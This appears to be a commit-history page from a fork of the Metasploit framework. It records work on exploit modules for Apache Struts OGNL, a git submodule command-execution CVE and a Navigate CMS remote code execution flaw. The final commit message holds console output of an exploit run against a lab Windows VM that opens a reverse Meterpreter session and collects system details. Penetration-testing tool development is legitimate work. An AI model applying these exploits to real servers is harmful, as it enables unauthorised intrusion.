adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
49,964 Commits 27 Branches 1,043 Tags
a7e44e39f1f6abbcede0a96dbb4e893bd7400db6
Commit Graph

1712 Commits

Author SHA1 Message Date
William Vu 38bdee19e8 Fix TARGETURI support in struts2_namespace_ognl 2018-12-14 13:08:50 -06:00
bwatters b109321b44 Kill unless not 2018-12-11 10:16:16 -06:00
William Vu 90b9204703 Update DisclosureDate to ISO 8601 in my modules 
Basic msftidy fixer:

diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb
index 9a21b9e398..e9ff2b21e5 100755
--- a/tools/dev/msftidy.rb
+++ b/tools/dev/msftidy.rb
@@ -442,6 +442,8 @@ class Msftidy
     # Check disclosure date format
     if @source =~ /["']DisclosureDate["'].*\=\>[\x0d\x20]*['\"](.+?)['\"]/
       d = $1  #Captured date
+      File.write(@full_filepath, @source.sub(d, Date.parse(d).to_s))
+      fixed('Probably updated traditional DisclosureDate to ISO 8601')
       # Flag if overall format is wrong
       if d =~ /^... (?:\d{1,2},? )?\d{4}$/
         # Flag if month format is wrong
 2018-11-16 12:18:28 -06:00
Jacob Robles 795aa3c99c Land #10828, git submodule url exec CVE-2018-17456 2018-11-14 12:39:13 -06:00
Jacob Robles 798d3156bc Print git command for module 2018-11-14 10:57:36 -06:00
Shelby Pace 5e85683228 removed to_s from string 2018-11-13 15:28:55 -06:00
Shelby Pace ac8932c144 update 9631 to a current branch 2018-11-13 15:15:25 -06:00
Alex Gonzalez da134f06e3 Updated check method 
Fixed check method and redundant variable declarations
 2018-11-13 16:01:40 -05:00
Spencer McIntyre caf76a6555 Add applicable notes to my exploit modules 2018-10-27 20:54:14 -04:00
Tim W b3d45586db feedback from code review 2018-10-18 12:30:46 +08:00
Tim W 64e257649f cleanup module 2018-10-18 11:45:59 +08:00
Tim W 290d4428c1 create git mixin 2018-10-18 11:31:31 +08:00
Tim W 063e477ff2 git submodule url exec (CVE-2018-17456) 2018-10-18 11:02:28 +08:00
William Vu 5b14d94957 Land #10671, struts2_namespace_ognl updates 
There are still some outstanding concerns, but I want to unblock this.
 2018-10-12 11:08:33 -05:00
William Vu 2989507b85 Copy check for data_header to avoid crash 
Variable was used but out of scope.
 2018-10-12 11:06:26 -05:00
Alex Gonzalez 1da99c8bd1 Fixed syntax errors 
Corrected redundant returns and indentation errors
 2018-10-11 10:01:47 -04:00
Alex Gonzalez 86f7c270c6 Fixed stylistic and syntax errors 2018-10-11 09:19:35 -04:00
Alex Gonzalez 0f3917f540 Fixed syntax errors 2018-10-10 13:26:49 -04:00
Alex Gonzalez 26482ee6d6 Fixed EOL spaces 2018-10-09 18:30:41 -04:00
Alex Gonzalez 9c9cd33c34 Fixed syntax errors and inconsistencies 2018-10-09 17:45:02 -04:00
Jacob Robles 8b955f8ec5 Land #10704, Navigate CMS Unauthenticated RCE 2018-10-04 06:44:21 -05:00
Jacob Robles 97729727d8 Minor modifications 2018-10-02 06:57:04 -05:00
Rob 6f5a8f8f42 Fix outdated metadata 2018-10-01 18:59:09 +01:00
asoto-r7 e4256f4595 Make ENABLE_STATIC an OptBool, as I should have done in the first place 2018-09-27 17:54:22 -05:00
Pyriphlegethon 342cfe4199 Refactor again 2018-09-27 12:38:05 +02:00
Pyriphlegethon 82b1f40925 Add cleanup code 2018-09-27 11:17:53 +02:00
Pyriphlegethon 2b86297138 Refactor 2018-09-27 11:16:54 +02:00
Pyriphlegethon f55483d17d Fix incorrect session_id extraction 2018-09-27 11:07:43 +02:00
Pyriphlegethon f882c3aec2 Add Navigate CMS Unauthenticated Remote Code Execution 2018-09-26 21:39:15 +02:00
asoto-r7 fd8ad6f4d8 struts2_namespace_ognl: Added verbose messages for errors with Tomcat >= 7.0.88 2018-09-18 15:26:28 -05:00
asoto-r7 4933f47ac5 struts2_namespace_ognl: Remove debugging code 2018-09-18 14:46:41 -05:00
asoto-r7 a9e6257891 struts2_namespace_ognl multishot OGNL payloads for Windows Meterpreter support 2018-09-18 14:27:47 -05:00
Brent Cook 6126a627cc Land #10570, AKA Metadata Refactor 2018-09-17 22:29:20 -05:00
Erin Bleiweiss 011c25ed59 Merge changes from master (ghostscript) 2018-09-17 13:57:28 -05:00
William Vu 4c036e70c1 Fix http://seclists.org links to https:// 
I have no idea how this happened in my own code. I was seeing https://.
 2018-09-15 18:54:45 -05:00
Wei Chen 718aaca0f4 Land #10546, Add Apache Struts exploit: CVE-2018-11776 2018-09-07 14:54:23 -05:00
Wei Chen bd50e00ccc Make some small changes: 
Changes made:

* DisclosureDate
* Privileged to false
* Remove gsub for ';'
* Set cmd/unix/generic as the default payload for ARCH_CMD (linux)
 2018-09-07 14:48:33 -05:00
asoto-r7 99ca6cef49 Quote-block cleanup and improved error handling 2018-09-07 11:43:04 -05:00
asoto-r7 3671f8f6b0 Handling for Tomcat namespace issues, 'allowStaticMethodAccess' settings, and payload output 
Depending on the configuration of the Tomcat server, `allowStaticMethodAccess` may already be set.  We now try to detect this as part of `profile_target`.  But that check might fail.  If so, we'll try our best and let the user control whether we prepend OGNL to enable `allowStaticMethodAccess` via the 'ENABLE_OGNL' option.

Additionally, sometimes enabling `allowStaticMethodAccess` will cause the OGNL query to fail.

Additionally additionally, some Tomcat configurations won't provide output from the payload.  We'll detect that the payload ran successfully, but tell the user there was no output.
 2018-09-06 17:56:42 -05:00
asoto-r7 7eb06b4592 Address travis errors: Updated metadata and target OS logic 2018-09-06 12:43:56 -05:00
asoto-r7 cb16f812ec struts2_namespace_ognl updates from code review 
Thanks to @wvu, @firefart, and @wchen!
 2018-09-06 11:50:57 -05:00
Erin Bleiweiss eb17d9b198 Refactor AKA references for modules 2018-08-31 16:56:05 -05:00
asoto-r7 8fe8bf62e3 Renamed to match existing struts2_content_type_ognl and improved comments 2018-08-31 13:48:22 -05:00
asoto-r7 35022d8332 Added payload upload+execution and OGNL-specific URI encoding 2018-08-31 13:39:42 -05:00
William Vu 7c7f63df45 Fix missing normalize_uri in struts2_rest_xstream 
I missed this one previously. May not be necessary but nice to have.
 2018-08-30 15:56:43 -05:00
asoto-r7 b373dcc5d4 First draft of module and documentation for struts_namespace_rce against CVE-2018-11776 2018-08-28 16:53:26 -05:00
William Vu f6b868bac2 Prefer regex for target check in exploit method 
This is how I initially wrote it out, and I think I like it better.
Obviously we'll still check individual symbols in execute_command, since
some of the matching is disjoint.
 2018-08-28 15:56:45 -05:00
William Vu 3dec79da23 Add Windows ARCH_CMD target and refactor again 
Must have been an oversight that I didn't add the target.
 2018-08-28 15:03:41 -05:00
William Vu 7d21c2094e Improve PSH target and refactor check code 2018-08-27 20:18:35 -05:00
William Vu df5f4caaae Uncomment PSH target in struts2_rest_xstream 
I'm full of shit. It works.

msf5 exploit(multi/http/struts2_rest_xstream) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500

meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
 2018-08-27 20:01:00 -05:00